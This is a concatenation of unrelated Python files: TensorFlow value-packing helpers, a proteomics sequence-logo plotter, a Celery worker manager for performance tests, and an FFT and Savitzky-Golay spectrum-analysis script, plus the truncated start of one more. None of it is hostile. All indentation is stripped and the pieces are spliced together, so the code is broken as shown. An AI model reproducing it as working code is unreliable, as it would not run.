copied_shape = array_ops.identity(value.dense_shape)
result = ops.IndexedSlices(copied_values, copied_indices, copied_shape)
else:
result = array_ops.identity(value)
return result
def is_indexed_slices(value):
if isinstance(value, ops.IndexedSlices):
return True
if isinstance(value, value_lib.DistributedValues):
return all(isinstance(v, ops.IndexedSlices) for v in value.values)
return False
def split_by_sparsity(values):
"""Split values into dense and sparse values.
Args:
values: a list of tensors or `PerReplica`s.
Returns:
Four lists:
a list of dense values, a list of their indices in `values` and
a list of sparse values, a list of their indices in `values`.
"""
dense_values = []
dense_indices = []
sparse_values = []
sparse_indices = []
for i, v in enumerate(values):
if is_indexed_slices(v):
sparse_values.append(v)
sparse_indices.append(i)
else:
dense_values.append(v)
dense_indices.append(i)
return dense_values, dense_indices, sparse_values, sparse_indices
def stitch_values(values_and_indices_list):
"""Stitch values together according to their indices.
Args:
values_and_indices_list: a list of tuples of values and indices indicating
the values and positions in the returned list.
Returns:
a stitched list of values.
"""
length = 0
for values_and_indices in values_and_indices_list:
length += len(values_and_indices[0])
result = [None] * length
for values_and_indices in values_and_indices_list:
if values_and_indices and values_and_indices[0]:
for v, i in zip(*values_and_indices):
assert result[i] is None
result[i] = v
return result
def group_by_size(input_tensors, bytes_per_pack):
"""Groups `input_tensors` into chunks of `bytes_per_pack`.
The method preserves the original order of `input_tensors`. The grouping is
best effort, each pack could have more or less bytes than `bytes_per_pack`.
It only groups values with known shape.
Args:
input_tensors: a list of Tensor.
bytes_per_pack: an integer.
Returns:
A list of packs of Tensor. All values are grouped into one pack if
`bytes_per_pack` is zero or any of the value has unknown shape.
"""
if bytes_per_pack == 0:
return [input_tensors]
packs = []
last_pack_size = 0
for value in input_tensors:
num_elements = value.shape.num_elements()
if num_elements is None:
# Can't pack values with unknown shape.
logging.warning(
'not packing values due to the unknown or inconsistent shape of %s',
value)
return [input_tensors]
size = num_elements * value.dtype.size
# Try to keep each pack as close to bytes_per_pack as possible, while each
# pack is at least bytes_per_pack large. I.E. we err on the side of having
# few but large packs.
if not packs or last_pack_size > bytes_per_pack:
packs.append([])
last_pack_size = 0
packs[-1].append(value)
last_pack_size += size
return packs
def _pad_util(input_tensor, full_axis_dim):
"""Pad the `input_tensor`'s first dimension to be `full_axis_dim`."""
missing_axis_dim = full_axis_dim - array_ops.shape_v2(input_tensor)[0]
tensor_rank = array_ops.rank(input_tensor)
paddings_axis = [[0, missing_axis_dim]]
paddings = array_ops.concat([
paddings_axis,
array_ops.zeros(shape=(tensor_rank - 1, 2), dtype=dtypes.int32)
],
axis=0)
padded_input_tensor = array_ops.pad(input_tensor, paddings)
return padded_input_tensor
| |
from collections import Counter
import logging
import os
import re
from matplotlib import transforms
from matplotlib import pyplot as plt
import matplotlib.patches as patches
from matplotlib.text import TextPath
from matplotlib.patches import PathPatch
from matplotlib.font_manager import FontProperties
import numpy as np
from scipy import stats
import pyproteome as pyp
from . import motif, plogo
BASES = list('ACDEFGHIKLMNPQRSTVWY')
GLOBSCALE = 1.4
LETTERS = {
base: TextPath(
(-0.303, 0),
base,
size=1,
prop=FontProperties(family='monospace', weight='bold'),
)
for base in BASES
}
LETTERS['Q'] = TextPath(
(-0.303, .11),
'Q',
size=1,
prop=FontProperties(family='monospace', weight='bold'),
)
LETTERS['G'] = TextPath(
(-0.303, .01),
'G',
size=1,
prop=FontProperties(family='monospace', weight='bold'),
)
LETTER_YSCALE = {
'Q': .84,
'G': .95,
}
COLORS_SCHEME = {
i: 'black'
for i in BASES
}
COLORS_SCHEME.update({
'C': '#BEB86B',
'D': '#800000',
'E': '#800000',
'F': '#6F6F6F',
'G': '#155939',
'H': '#142B4F',
'K': '#142B4F',
'R': '#142B4F',
'N': '#A97C50',
'P': '#1C5E3F',
'Q': '#A97C50',
'S': '#4A79A5',
'T': '#4A79A5',
'L': '#000000',
'A': '#000000',
'I': '#000000',
'M': '#000000',
'V': '#000000',
'W': '#000000',
'Y': '#6F6F6F',
})
LOGGER = logging.getLogger('pyp.motifs.logo')
def _letterAt(letter, x, y, alpha=1, xscale=1, yscale=1, ax=None):
text = LETTERS[letter]
yscale *= LETTER_YSCALE.get(letter, .98)
t = transforms.Affine2D().scale(
xscale * GLOBSCALE, yscale * GLOBSCALE
) + transforms.Affine2D().translate(x, y) + ax.transData
p = PathPatch(
text,
lw=0,
fc=COLORS_SCHEME[letter],
alpha=alpha,
transform=t,
)
if ax is not None:
ax.add_artist(p)
return p
def _calc_score(
fore_hit_size, fore_size, back_hit_size, back_size,
prob_fn=None,
):
if prob_fn is None:
prob_fn = 'hypergeom'
assert prob_fn in ['hypergeom', 'binom']
if back_hit_size <= 0:
return 0
k = fore_hit_size
n = fore_size
K = back_hit_size
N = back_size
p = K / N
if prob_fn == 'hypergeom':
binomial = stats.hypergeom(N, K, n)
else:
binomial = stats.binom(n, p)
pr_gt_k = binomial.sf(k - 1)
pr_lt_k = binomial.cdf(k)
if pr_lt_k <= 0:
return -200
elif pr_gt_k <= 0:
return 200
else:
return -np.log10(pr_gt_k / pr_lt_k)
def _calc_scores(bases, fore, back, p=0.05, prob_fn=None):
length = len(back[0])
fore_counts = [
Counter(i[pos] for i in fore)
for pos in range(length)
]
back_counts = [
Counter(i[pos] for i in back)
for pos in range(length)
]
return {
base: [
_calc_score(
fore_counts[pos][base],
len(fore),
back_counts[pos][base],
len(back),
prob_fn=prob_fn,
)
for pos in range(length)
]
for base in bases
}, _calc_hline(back_counts, p=p)
def _calc_hline(back_counts, p=0.05):
'''
Calculate the significance cutoff using multiple-hypothesis correction.
Parameters
----------
back_counts : collections.Counter of str, int
Frequency of residues found in the background set.
p : float, optional
Returns
-------
float
Signficance cutoff in log-odds space.
'''
num_calc = sum(
1
for counts in back_counts
for _, count in counts.items()
if count > 0
)
alpha = p / num_calc
return abs(np.log10(alpha / (1 - alpha)))
def make_logo(data, f, **kwargs):
'''
Create a logo from a pyproteome data set using a given filter to define
the foreground set.
Parameters
----------
data : :class:`pyproteome.data_sets.DataSet`
f : dict
Filter passed to :func:`pyproteome.data_sets.DataSet.filter` to define the foreground set.
kwargs
Arguments passed on to :func:`.logo`
Returns
-------
fig, axes
'''
LOGGER.info('Generating motif logo')
nmer_args = motif.get_nmer_args(kwargs)
fore = [
n.upper()
for n in motif.generate_n_mers(
data.filter(f)['Sequence'],
**nmer_args
)
]
back = [
n.upper()
for n in motif.generate_n_mers(
data['Sequence'],
**nmer_args
)
]
title = kwargs.pop('title', plogo.format_title(data=data, f=f))
fig, ax = logo(
fore, back,
title=title,
**kwargs
)
return fig, ax
def _draw_logo(
scores,
ax,
p_line=None,
title=None,
ytitle='',
width=10,
height=6,
fade_power=1,
low_res_cutoff=0,
show_title=True,
show_ylabel=True,
minmaxy=None,
):
length = len(list(scores.values())[0])
left_margin = (
.15 / width * 5
)
if show_ylabel:
left_margin += .02
ax.add_patch(
patches.Rectangle(
(left_margin, 0.01),
.998 - left_margin,
.98,
fill=False,
linewidth=1,
edgecolor='k',
zorder=10,
)
)
ax.add_patch(
patches.Rectangle(
(left_margin, .46),
.9985 - left_margin,
.08,
fill=False,
linewidth=1,
edgecolor='k',
zorder=10,
)
)
# ax.add_patch(
# patches.Rectangle(
# (left_margin, .5),
# .9985 - left_margin,
# .001,
# fill=False,
# linewidth=1,
# edgecolor='k',
# zorder=10,
# )
# )
axes = (
ax.inset_axes([
left_margin, .54,
1 - left_margin, .46,
]),
ax.inset_axes([
left_margin, 0,
1 - left_margin, .46,
])
)
yax = ax.inset_axes([
0, 0,
1, 1,
])
xwidth = (1 - left_margin) / length
xpad = xwidth / 2
xax = ax.inset_axes([
left_margin + xpad, 0.52,
xwidth * (length - 1), .11,
])
yax.patch.set_alpha(0)
xax.patch.set_alpha(0)
if p_line is not None:
axes[0].axhline(p_line, color='red')
axes[1].axhline(-p_line, color='red')
miny, maxy = -p_line, p_line
else:
miny, maxy = 0, 0
x = 1
yax.xaxis.set_ticks([])
yax.yaxis.set_ticks([])
xax.yaxis.set_ticks([])
xax.spines['bottom'].set_position(('data', 0))
xax.set_ylim(bottom=-2, top=2.4)
for ax in (yax, xax) + axes:
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('none')
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
if show_title:
yax.set_title(title)
xax.set_xticks(
range(0, length),
)
y_offset = (
76 * np.power(xax.get_window_extent().height, -1.453)
) - .4
y_offset = -.15
xax.set_xticklabels(
[
'{:+d}'.format(i) if i != 0 else '0'
for i in range(-(length - 1) // 2, (length - 1) // 2 + 1)
],
va='center',
ha='center',
y=y_offset,
fontsize=8,
)
for i in range(0, length):
base_scores = [(b, scores[b][i]) for b in BASES]
base_scores = (
sorted([i for i in base_scores if i[1] < 0], key=lambda t: -t[1]) +
sorted([i for i in base_scores if i[1] >= 0], key=lambda t: -t[1])
)
base_scores = [
i
for i in base_scores
if abs(i[1]) >= (p_line or 0) * low_res_cutoff
]
y = sum(i[1] for i in base_scores if i[1] < 0)
miny = min(miny, y)
for base, score in base_scores:
_letterAt(
base, x, y,
alpha=min([1, abs(score / (p_line or 1))]) ** fade_power,
xscale=1.2,
yscale=abs(score),
ax=axes[1 if score < 0 else 0],
)
y += abs(score)
x += 1
maxy = max(maxy, y)
if minmaxy is None:
minmaxy = max(abs(i) for i in [miny, maxy])
for ind, ax in enumerate(axes):
ax.set_xlim(
left=.5,
right=x - .5,
)
ax.set_ylim(
bottom=-1.05 * minmaxy if ind == 1 else 0,
top=1.05 * minmaxy if ind == 0 else 0,
)
ax.set_xticks([])
spacing = minmaxy // 3
if spacing != 0:
ax.set_yticks(
[
i
for i in np.arange(
spacing if ind == 0 else -spacing,
(spacing + 1) * (3 if ind == 0 else -3),
spacing * (1 if ind == 0 else -1)
)
if abs(i) >= abs(p_line)
],
)
else:
ax.set_yticks(
np.arange(
0,
minmaxy if ind == 0 else -minmaxy,
1 if ind == 0 else -1,
)
)
ax.set_yticklabels(
ax.get_yticks(),
)
if show_ylabel:
yax.set_ylabel(
ytitle,
)
return (yax, xax,) + axes, minmaxy
def logo(
fore, back,
ax=None,
title='',
width=12,
height=8,
p=0.05,
fade_power=1,
low_res_cutoff=0,
prob_fn=None,
show_title=True,
show_ylabel=True,
show_n=True,
minmaxy=None,
):
'''
Generate a sequence logo locally using pLogo's enrichment score.
Parameters
----------
fore : list of str
back : list of str
title : str, optional
p : float, optional
p-value to use for residue significance cutoff. This value is corrected
for multiple-hypothesis testing before being used.
fade_power : float, optional
Set transparency of residues with scores below p to:
(score / p) ** fade_power.
low_res_cutoff : float, optional
Hide residues with scores below p * low_res_cutoff.
prob_fn : str, optional
Probability function to use for calculating enrichment. Either
'hypergeom' or 'binom'. The default, hypergeom, is more accurate but
more computationally expensive.
Returns
-------
fig : :class:`matplotlib.figure.Figure`
axes : :class:`matplotlib.axes.Axes`
'''
if len(back) == 0:
return None, None
length = len(back[0])
assert length > 0
assert (
all(len(i) == len(back[0]) for i in fore) and
all(len(i) == len(back[0]) for i in back)
)
rel_info, p_line = _calc_scores(
BASES, fore, back,
p=p,
prob_fn=prob_fn,
)
if ax is None:
_, ax = plt.subplots(figsize=(width / 2, height / 2))
ax.axis('off')
axes, minmaxy = _draw_logo(
scores=rel_info,
p_line=p_line,
title=title,
ytitle='log odds',
width=width,
height=height,
fade_power=fade_power,
low_res_cutoff=low_res_cutoff,
show_title=show_title,
show_ylabel=show_ylabel,
ax=ax,
minmaxy=minmaxy,
)
if show_n:
axes[3].text(
length + .4,
-minmaxy,
'n(fg) = {}\nn(bg) = {}'.format(len(fore), len(back)),
color='darkred',
fontsize=18,
ha='right',
va='bottom',
)
return ax.get_figure(), axes
| |
import os
import signal
import sys
import time
from itertools import cycle
from typing import Callable
from celery import Celery
from sqlalchemy import create_engine
from logger import logger
from perfrunner import celerylocal, celeryremote
from perfrunner.helpers import local
from perfrunner.helpers.remote import RemoteHelper
from perfrunner.settings import (
ClusterSpec,
PhaseSettings,
TargetIterator,
TestConfig,
)
from perfrunner.workloads import spring_workload
from perfrunner.workloads.jts import jts_run, jts_warmup
from perfrunner.workloads.pillowfight import (
pillowfight_data_load,
pillowfight_workload,
)
from perfrunner.workloads.ycsb import ycsb_data_load, ycsb_workload
celery = Celery('workers')
if '--remote' in sys.argv or '-C' in sys.argv:
# -C flag is a hack to distinguish local and remote workers!
celery.config_from_object(celeryremote)
else:
celery.config_from_object(celerylocal)
@celery.task
def spring_task(*args):
spring_workload(*args)
@celery.task
def pillowfight_data_load_task(*args):
pillowfight_data_load(*args)
@celery.task
def pillowfight_task(*args):
pillowfight_workload(*args)
@celery.task
def ycsb_data_load_task(*args):
ycsb_data_load(*args)
@celery.task
def ycsb_task(*args):
ycsb_workload(*args)
@celery.task
def jts_run_task(*args):
jts_run(*args)
@celery.task
def jts_warmup_task(*args):
jts_warmup(*args)
class WorkerManager:
def __new__(cls, *args, **kwargs):
if '--remote' in sys.argv:
return RemoteWorkerManager(*args, **kwargs)
else:
return LocalWorkerManager(*args, **kwargs)
class RemoteWorkerManager:
WORKER_HOME = '/tmp/perfrunner'
PING_INTERVAL = 1
def __init__(self, cluster_spec: ClusterSpec, test_config: TestConfig,
verbose: bool):
self.cluster_spec = cluster_spec
self.test_config = test_config
self.remote = RemoteHelper(cluster_spec, verbose)
self.workers = cycle(self.cluster_spec.workers)
self.terminate()
self.start()
self.wait_until_workers_are_ready()
@property
def is_remote(self) -> bool:
return True
def next_worker(self) -> str:
return next(self.workers)
def reset_workers(self):
self.workers = cycle(self.cluster_spec.workers)
def start(self):
logger.info('Initializing remote worker environment')
self.remote.init_repo(self.WORKER_HOME)
for worker in self.cluster_spec.workers:
logger.info('Starting remote Celery worker, host={}'.format(worker))
perfrunner_home = os.path.join(self.WORKER_HOME, 'perfrunner')
self.remote.start_celery_worker(worker, perfrunner_home)
def wait_until_workers_are_ready(self):
workers = ['celery@{}'.format(worker)
for worker in self.cluster_spec.workers]
while True:
responses = celery.control.ping(workers)
if len(responses) == len(workers):
break
time.sleep(self.PING_INTERVAL)
logger.info('All remote Celery workers are ready')
def run_tasks(self,
task: Callable,
task_settings: PhaseSettings,
target_iterator: TargetIterator,
timer: int = None):
if self.test_config.test_case.reset_workers:
self.reset_workers()
self.async_results = []
for target in target_iterator:
for instance in range(task_settings.workload_instances):
worker = self.next_worker()
logger.info('Running the task on {}'.format(worker))
async_result = task.apply_async(
args=(task_settings, target, timer, instance),
queue=worker, expires=timer,
)
self.async_results.append(async_result)
def wait_for_workers(self):
logger.info('Waiting for all tasks to finish')
for async_result in self.async_results:
async_result.get()
logger.info('All tasks are done')
def download_celery_logs(self):
if not os.path.exists('celery'):
os.mkdir('celery')
self.remote.get_celery_logs(self.WORKER_HOME)
def abort(self):
pass
def terminate(self):
logger.info('Terminating Celery workers')
self.remote.terminate_client_processes()
class LocalWorkerManager(RemoteWorkerManager):
BROKER_DB = 'perfrunner.db'
RESULTS_DB = 'results.db'
def __init__(self, cluster_spec: ClusterSpec, test_config: TestConfig,
verbose: bool):
self.cluster_spec = cluster_spec
self.test_config = test_config
self.terminate()
self.tune_sqlite()
self.start()
self.wait_until_workers_are_ready()
@property
def is_remote(self) -> bool:
return False
def next_worker(self) -> str:
return 'localhost'
def tune_sqlite(self):
for db in self.BROKER_DB, self.RESULTS_DB:
engine = create_engine('sqlite:///{}'.format(db))
engine.execute('PRAGMA synchronous=OFF;')
def wait_until_workers_are_ready(self):
engine = create_engine('sqlite:///{}'.format(self.BROKER_DB))
query = 'SELECT COUNT(*) FROM kombu_queue WHERE name = "{}"'\
.format(self.next_worker())
while True:
if 'kombu_queue' not in engine.table_names():
continue
for count, in engine.execute(query):
if count:
logger.info('Local Celery worker is ready')
return
def start(self):
logger.info('Starting local Celery worker')
local.start_celery_worker(queue=self.next_worker())
def download_celery_logs(self):
pass
@property
def pid(self) -> int:
with open('worker.pid') as f:
pid = f.read()
return int(pid)
def abort(self):
logger.info('Interrupting Celery workers')
os.kill(self.pid, signal.SIGPWR)
self.wait_for_workers()
def terminate(self):
logger.info('Terminating Celery workers')
local.kill_process('celery')
| |
##############################################################################
# Created by Garrett Thompson
# Graphical User Interface for Data Analysis
# Created at Northern Arizona University
# for use in the Astrophysical Ice Laboratory
# Advisors: Jennifer Hanley, Will Grundy, Henry Roe
# garrett.leland.thompson@gmail.com
##############################################################################
import os
import csv
import time
import warnings
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit as cf
from scipy.fftpack import fft, fftfreq, ifft
from scipy.signal import savgol_filter as sgf
from scipy.integrate import trapz
def main():
folder_to_save = choose_dir()
#choose files for analysis
raw_x,raw_y, raw_xbg,raw_ybg = choose_files(folder_to_save)
print("Plotting imported data...")
plotting_data_for_inspection(raw_x,raw_y,'Raw Data','Wavenumber (cm-1)','% Transmittance','rawspectrum.pdf',folder_to_save, False)
plotting_data_for_inspection(raw_xbg,raw_ybg,'Raw Background','Wavenumber (cm-1)','% Transmittance','rawbackground.pdf',folder_to_save, False)
#user chooses method after inspecting plots
user_method = str(input('Press "s" for savitsky-golay filter, or "f" for fft filter\n:'))
choosing = True
while choosing:
if user_method.lower() == 's':
# savitsky-golay option was chosen
choosing = False
args_list = [folder_to_save, raw_y, raw_ybg, raw_x]
raw_x, norm_smooth = sgf_calc(args_list)
plot_data(raw_x,norm_smooth,folder_to_save)
elif user_method.lower() == 'f':
# fft option was chosen
choosing = False
frq_x,frq_xbg,fft_y,fft_ybg = fft_calculation(raw_x,raw_y,raw_xbg,raw_ybg,folder_to_save)
plot_figure, plot_axis = plotting_data_for_inspection(frq_x,np.log(abs(fft_ybg)),'FFT of raw bg','Cycles/Wavenumber (cm)','Log(Power/Frequency)','fft_background.pdf',folder_to_save, False)
filt_y = fft_y.copy()
filt_ybg = fft_ybg.copy()
input('Zoom to liking, then press enter to start')
print('Left to add, middle to remove nearest, and right to finish')
# global frq_cid
vert_lines=[]
frq_cid = plot_figure.canvas.mpl_connect('button_press_event',lambda event: freq_click(event, [frq_x,fft_ybg,plot_figure,plot_axis,vert_lines,filt_y,filt_ybg,folder_to_save,raw_x]))
plt.show()
plot_figure.canvas.mpl_disconnect(frq_cid)
# vert_lines, frq_x, filt_y, filt_ybg = args_dict["vert_lines"],args_dict["frq_x"],args_dict["filt_y"],args_dict["filt_ybg"]
def save_as_csv(folder_to_save,title, column1_title,column2_title,column1_data,column2_data):
os.chdir(folder_to_save)
with open(title,"w") as f:
writer = csv.writer(f)
writer.writerow([column1_title,column2_title])
writer.writerows(list(zip(column1_data,column2_data)))
os.chdir('..')
def fft_calculation(raw_x,raw_y,raw_xbg,raw_ybg,folder_to_save):
""" calculates FFT of data for use in nipping unwanted frequencies"""
# finds FFT of ydata
fft_y = fft(raw_y)
fft_ybg = fft(raw_ybg)
# gets frequencies for FFT of data from array, and sample spacing
frq_x = fftfreq(len(fft_y),((max(raw_x)-min(raw_x))/len(fft_y)))
frq_xbg = fftfreq(len(fft_ybg),((max(raw_xbg)-min(raw_xbg))/len(fft_ybg)))
save_as_csv(folder_to_save,"FFT_Raw_bg_data.csv","frq_x","log(abs(fft_bg))",frq_x,np.log(abs(fft_ybg)))
return frq_x, frq_xbg, fft_y, fft_ybg
def choose_dir():
"""
User chooses where all work will be saved and
time stamp is created for future reference
"""
# Where all work to follow will be saved
folder_to_save = input('Type name of directory to save all data being created\n:')
# make and change to directory named by user
os.mkdir(folder_to_save)
os.chdir(folder_to_save)
# recording date and time that program is run, saving it to folder
with open("time_created.txt", "w") as text_file:
text_file.write("Time this program was run: {} \n".format(time.strftime("%Y-%m-%d %H:%M")))
os.chdir('..')
return folder_to_save
def plotting_data_for_inspection(xdata,ydata,plot_title,plot_xlabel,plot_ylabel,filename_for_saving,folder_to_save, block_boolean):
"""
Plots data for user to look at within program
parameters
----------
xdata,ydata: x and y data to be plotted
plot_xlabel,plot_ylabel: label x and y axes in plot
file_name_for_saving: string given for saving file for later referece
block_boolean: True or False, tells if program waits for figure to close
"""
plot_figure, plot_axis = plt.subplots()
plt.plot(xdata,ydata,color='blue')
plt.xlabel(plot_xlabel)
plt.ylabel(plot_ylabel)
plt.suptitle(plot_title)
plt.show(block=block_boolean)
os.chdir(folder_to_save)
plt.savefig(filename_for_saving)
os.chdir('..')
return plot_figure, plot_axis
def choose_files(folder_to_save):
"""
Lets user determine which files will be imported for analysis
and saves preferences for reference later on
"""
raw_import = str(input('Enter a raw dataset for analysis\n:'))
print("\nGot it! Importing now... \n")
raw_x,raw_y = import_data(raw_import)
bg_import = str(input('Enter a raw background for analysis\n:'))
print("\nGot it! Importing now... \n")
raw_xbg,raw_ybg = import_data(bg_import)
os.chdir(folder_to_save)
with open("data_files_used.txt", "w") as text_file:
text_file.write("Raw data file used: {} \n".format(raw_import))
text_file.write("Raw background data file used: {}".format(bg_import))
concentration = str(input('Enter concentration of mixture\n:'))
# saving text file of concentration for later use in plotting
with open("concentration.txt","w") as f:
f.write(concentration)
temperature = str(input('Enter temperature of mixture\n:'))
# saving text file of temperature for later use in plotting
with open("temperature.txt","w") as f:
f.write(temperature)
os.chdir('..')
return raw_x, raw_y,raw_xbg,raw_ybg
# assumes a csv file, as all data stored from ice lab is in CSV format
def import_data(filename):
raw_data = np.loadtxt(open(filename,"rb"),delimiter=",")
xdat = raw_data[:,0]
ydat = raw_data[:,1]
return xdat,ydat
def freq_click(event, args_list):
# if button_click = left: add left line
# if button_click = middle: removes closest line
# if button_lick = right: finish
# add clicked data points to list
frq_x,fft_ybg,plot_figure,plot_axis,vert_lines, filt_y, filt_ybg,folder_to_save, raw_x = args_list
plt.xlim(plt.gca().get_xlim())
plt.ylim(plt.gca().get_ylim())
if event.button==1:
vert_lines.append(event.xdata)
plot_axis.plot(frq_x,np.log(np.abs(fft_ybg)),color='blue')
#plt.axvline(x=vert_lines[-1],color='black')
for val in vert_lines:
plt.axvline(x=val,color='black')
plt.xlabel('Cycles/Wavenumber')
plt.ylabel('Relative Intensity')
# draws points as they are added
plt.draw()
if event.button==2:
# middle click, remove closest vertical line
print ('pop!')
# gets x,y limits of graph,saves them before destroying figure
xlims = plt.gca().get_xlim()
ylims = plt.gca().get_ylim()
# clears axes, to get rid of old scatter points
plot_axis.cla()
# re-plots spectrum
plot_axis.plot(frq_x,np.log(np.abs(fft_ybg)),color='blue')
# sets axes limits to original values
plt.xlim(xlims)
plt.ylim(ylims)
plt.xlabel('Cycles/Wavenumber')
plt.ylabel('Relative Intensity')
# deletes point closest to mouse click
xindx = np.abs(vert_lines-event.xdata).argmin()
del vert_lines[xindx]
for line in vert_lines:
plt.axvline(x=line,color='black')
# draws the new set of vertical lines
plt.draw()
if event.button==3:
# right click, ends clicking awareness
# plot_figure.canvas.mpl_disconnect(frq_cid)
os.chdir(folder_to_save)
plt.savefig('FFT_filter.pdf')
with open("freq_window.csv", "w") as f:
writer = csv.writer(f)
writer.writerow(["Xposition of vert. line"])
writer.writerows(list(zip(vert_lines)))
os.chdir('..')
# first window
args_dict ={"vert_lines":vert_lines,"frq_x":frq_x,"filt_y":filt_y,"filt_ybg":filt_ybg}
plt.close("all")
argslist = [vert_lines,frq_x,filt_y,filt_ybg]
filt_y,filt_ybg = window_filter(argslist)
fft_calc(filt_y, filt_ybg, raw_x,folder_to_save)
def fft_calc(filt_y, filt_ybg, raw_x,folder_to_save):
# dividing filtered y data from filtered bg data
norm_fft = ifft(filt_y)/ifft(filt_ybg)
save_as_csv(folder_to_save,"fft_data.csv","raw_x","fft_filt",raw_x,norm_fft.real)
plot_data(raw_x,norm_fft.real,folder_to_save)
def sgf_calc(args_list):
folder_to_save, raw_y, raw_ybg, raw_x = args_list
# warning when using sgf option
warnings.filterwarnings(action="ignore", module="scipy",message="^internal gelsd")
window_param = int(input('Input window box size (must be odd number)\n:'))
poly_param = int(input('Input polynomial order for smoothing\n:'))
# saving parameters chosen for future inspection
os.chdir(folder_to_save)
with open("sgf_params.txt", "w") as sgf_file:
sgf_file.write("Window parameter used: {} \n".format(window_param))
sgf_file.write("Polynomial paramter used: {}".format(poly_param))
#global norm_smooth
smoothed_y = sgf(raw_y,window_param,poly_param,delta=(abs(raw_y)[1]-raw_y)[0])
smoothed_ybg =sgf(raw_ybg,window_param,poly_param,delta=(abs(raw_ybg)[1]-raw_ybg)[0])
# dividing filtered y data from filtered bg data
norm_smooth = smoothed_y / smoothed_ybg
rows = list(zip(raw_x,norm_smooth))
with open("sgf_data.csv", "w") as f:
writer = csv.writer(f)
writer.writerow(["window","polynomail order"])
writer.writerow([window_param,poly_param])
writer.writerow(["raw_x","sgf_filt"])
writer.writerows(rows)
os.chdir('..')
return raw_x,norm_smooth
# range of frequenices to cut out
def window_filter(args_list):
vert_lines, frq_x, filt_y, filt_ybg = args_list
window_min, window_max= vert_lines[-2], vert_lines[-1]
for i in range(len(frq_x)):
if (frq_x[i] >= window_min and frq_x[i] <=window_max) or (frq_x[i]>-1*window_max and frq_x[i]<-1*window_min):
filt_y[i] = 0
filt_ybg[i] = 0
return filt_y,filt_ybg
def plot_data(x,y,folder_to_save):
plot_figure,plot_axis = plotting_data_for_inspection(x,y,"Divide and Filtered Spectrum","Wavenumber cm-1","Relative Intensity","dv_filt_spectrum.pdf",folder_to_save, False)
order = int(input('Zoom to liking and then enter what order polynomial for continuum fit\n:'))
xcoords,ycoords = [],[]
# tells python to turn on awareness for button presses
global cid
cid = plot_figure.canvas.mpl_connect('button_press_event', lambda event: onclick(event, [xcoords,ycoords,plot_figure,plot_axis,order,folder_to_save,x,y]))
print('Left to add, middle to remove nearest, and right to finish')
plt.show()
# for creating continuum fit to divide out
def onclick(event,argslist):
xcoords,ycoords,plot_figure,plot_axis,order,folder_to_save,x,y = argslist
global pvals
if event.button==1:
# left click
plt.xlim(plt.gca().get_xlim())
plt.ylim(plt.gca().get_ylim())
#plt.cla()
try:
# only delete if curve_fit line already drawn
if len(plot_axis.lines) !=1: plot_axis.lines.remove(plot_axis.lines[-1])
except: UnboundLocalError
# add clicked data points to list
xcoords.append(event.xdata)
ycoords.append(event.ydata)
plot_axis.scatter(xcoords,ycoords,color='black')
plt.xlabel('Wavenumber cm-1')
plt.ylabel('Relative Intensity')
plt.draw()
xvals = np.array(xcoords)
yvals = np.array(ycoords)
# fits values to polynomial, rankwarning is irrelevant
warnings.simplefilter('ignore', np.RankWarning)
p_fit = np.polyfit(xvals,yvals,order)
pvals = np.poly1d(p_fit)
plot_axis.plot(x,pvals(x),color='black')
plt.draw()
# plt.show(block=False)
if event.button==2:
# middle click, remove closest point to click
print ('pop!')
# gets x,y limits of graph,saves them before destroying figure
xlims = plt.gca().get_xlim()
ylims = plt.gca().get_ylim()
# clears axes, to get rid of old scatter points
plot_axis.cla()
# re-plots spectrum
plot_axis.plot(x,y)
# sets axes limits to original values
plt.xlim(xlims)
plt.ylim(ylims)
plt.xlabel('Wavenumber cm-1')
plt.ylabel('Relative Intensity')
# deletes point closest to mouse click
xindx = np.abs(xcoords-event.xdata).argmin()
del xcoords[xindx]
yindx = np.abs(ycoords-event.ydata).argmin()
del ycoords[yindx]
# draws the new set of scatter points, and colors them
plot_axis.scatter(xcoords,ycoords,color='black')
plt.draw()
xvals = np.array(xcoords)
yvals = np.array(ycoords)
# fits values to polynomial, rankwarning is ignored
warnings.simplefilter('ignore', np.RankWarning)
p_fit = np.polyfit(xvals,yvals,order)
pvals = np.poly1d(p_fit)
plot_axis.plot(x,pvals(x),color='black')
plt.draw()
if event.button==3:
# right click,ends clicking awareness
plot_figure.canvas.mpl_disconnect(cid)
os.chdir(folder_to_save)
plt.savefig('continuum_chosen.pdf')
# Saving polynomial eqn used in continuum divide for reference
with open("continuum_polynomial.txt", "w") as save_file:
save_file.write("%s *x^ %d " %(pvals[0],0))
for i in (range(len(pvals))):
save_file.write("+ %s *x^ %d " %(pvals[i+1],i+1))
os.chdir('..')
calc_coeffs(pvals,x,y,folder_to_save)
def calc_coeffs(pvals,x,y,folder_to_save):
fit_y = pvals(x)
# flattens the continuum
new_continuum = y / fit_y
thickness = int(input('\nEnter thickness of cell in cm\n:'))
# 2 cm thickness for our work in 2016
# remove runtime errors when taking negative log and dividing
err_settings = np.seterr(invalid='ignore')
alpha_coeffs = -np.log(new_continuum) / thickness
plotting_data_for_inspection(x,alpha_coeffs,"Alpha Coefficients","Wavenumber cm-1","Absorption cm-1","alpha_coeffs.pdf",folder_to_save,False)
save_as_csv(folder_to_save,"alpha_coeffs.csv","x","alpha",x,alpha_coeffs)
# creating masks around each peak
x_mask1 = x[(x>10000) & (x<10500)]
x_mask2 = x[(x>11200) & (x<12000)]
y_mask1 = alpha_coeffs[(x>10000) & (x<10500)]
y_mask2 = alpha_coeffs[(x>11200) & (x<12000)]
# writing data for plotting later
save_as_csv(folder_to_save,"10000_peak.csv","x","y",x_mask1,y_mask1)
save_as_csv(folder_to_save,"11200_peak.csv","x","y",x_mask2,y_mask2)
# integrated area calcs
area10000=trapz(y_mask1,x_mask1)
area11200=trapz(y_mask2,x_mask2)
os.chdir(folder_to_save)
with open("10000area.txt","w") as f:
f.write(str(area10000))
with open("11200area.txt","w") as f:
f.write(str(area11200))
os.chdir('..')
finish_prog = input("Press 'y' when finished\n:")
check = True
while check:
if (finish_prog =="y"): check = False
plt.close('all')
print("Finished!")
quit() # end of program
if __name__ == '__main__':
main()
| |
"""
Created on Nov 19, 2015
@author: victor
"""
import numpy
import os
from optparse import OptionParser
from nma_algo_char.common import load_control_json, pair_parameter_values,\
parameter_value_to_string, create_directory, MetropolisMCSimulator,\
scatter_plot_by_hue
from collections import defaultdict
from pandas.core.frame import DataFrame
import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats
import cPickle as pickle
from nma_algo_char.data_retrieval import load_ic_data, load_cc_data,\
